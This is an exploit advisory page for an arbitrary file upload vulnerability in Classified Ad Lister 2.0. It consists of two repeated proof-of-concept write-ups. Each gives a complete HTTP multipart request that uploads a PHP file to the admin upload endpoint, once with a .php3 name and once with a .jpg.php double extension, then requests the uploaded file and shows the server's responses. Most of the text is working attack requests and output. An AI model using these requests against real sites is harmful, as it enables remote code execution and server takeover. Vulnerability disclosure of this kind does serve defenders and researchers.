Classified Ad Lister 2.0 Arbitrary File Upload

2019.04.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

=========================================================================================== # Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload # Dork: N/A # Date: 25-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.netartmedia.net/adlister # Software Link: https://www.netartmedia.net/adlister # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Classified Ad Lister is a free, responsive and easy to install php script (not using any database, so the installation is as easy as copying the files to the website or folder you prefer) which allows to manage and show classified or product listings on a website. =========================================================================================== # POC - Arbitrary File Upload # Parameters : uploads # POST Method : http://localhost/classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 # Injection Request POST /classified/admin/upload.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 248 Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287 Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan Origin: http://localhost Referer: http://localhost/classified/admin/index.php?page=add Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 --0eaa6514f42e46cbb8d84e040ff20287 Content-Disposition: form-data; name="myfile[]"; filename="d571bf7952b140d4bff5d1c272e9c992.php3" Content-Type: application/octet-stream <?php print(int)0xFFF9999-24 ?> --0eaa6514f42e46cbb8d84e040ff20287-- # Identification Page GET /classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 # Injection Response HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 41 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ["d571bf7952b140d4bff5d1c272e9c992.php3"] # Identification Page HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 9 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload # Dork: N/A # Date: 25-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.netartmedia.net/adlister # Software Link: https://www.netartmedia.net/adlister # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Classified Ad Lister is a free, responsive and easy to install php script (not using any database, so the installation is as easy as copying the files to the website or folder you prefer) which allows to manage and show classified or product listings on a website. =========================================================================================== # POC - Arbitrary File Upload # Parameters : uploads # POST Method : http://localhost/classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php # Injection Request POST /classified/admin/upload.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 251 Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287 Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan Origin: http://localhost Referer: http://localhost/classified/admin/index.php?page=add Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 --0eaa6514f42e46cbb8d84e040ff20287 Content-Disposition: form-data; name="myfile[]"; filename="ad14667cae5d4e28bfb5b53df1687ed6.jpg.php" Content-Type: application/octet-stream <?php print(int)0xFFF9999-24 ?> --0eaa6514f42e46cbb8d84e040ff20287-- # Identification Page GET /classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 # Injection Response HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 44 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ["ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"] # Identification Page HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 9 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top